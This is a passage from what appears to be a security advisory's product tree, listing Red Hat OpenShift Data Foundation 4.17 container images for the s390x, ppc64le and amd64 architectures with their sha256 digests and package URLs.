"odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", product_id: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5?arch=s390x&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", product: { name: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", product_id: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb?arch=s390x&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", product: { name: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", product_id: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705?arch=s390x&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", product: { name: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", product_id: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", product_id: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.17.0-51", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", product: { name: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", product_id: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.17.0-46", }, }, }, { category: "product_version", name: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", product: { name: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", product_id: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", product: { name: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", product_id: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", product: { name: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", product_id: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", product: { name: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", product_id: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", product: { name: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", product_id: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", product: { name: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", product_id: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", product: { name: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", product_id: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", product: { name: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", product_id: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.17.0-66", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", product: { name: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", product_id: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", product: { name: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", product_id: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", product: { name: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", product_id: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", product: { name: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", product_id: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.17.0-7", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", product_id: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", product_id: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", product: { name: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", product_id: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", product: { name: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", product_id: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", product: { name: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", product_id: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", product_id: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", product: { name: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", product_id: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", product: { name: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", product_id: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", product: { name: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", product_id: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", product: { name: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", product_id: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", product: { name: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", product_id: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", product_id: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.17.0-51", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", product: { name: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", product_id: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.17.0-46", }, }, }, { category: "product_version", name: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", product: { name: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", product_id: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", product: { name: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", product_id: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", product: { name: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", product_id: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", product: { name: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", product_id: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", product_identification_helper: { purl: 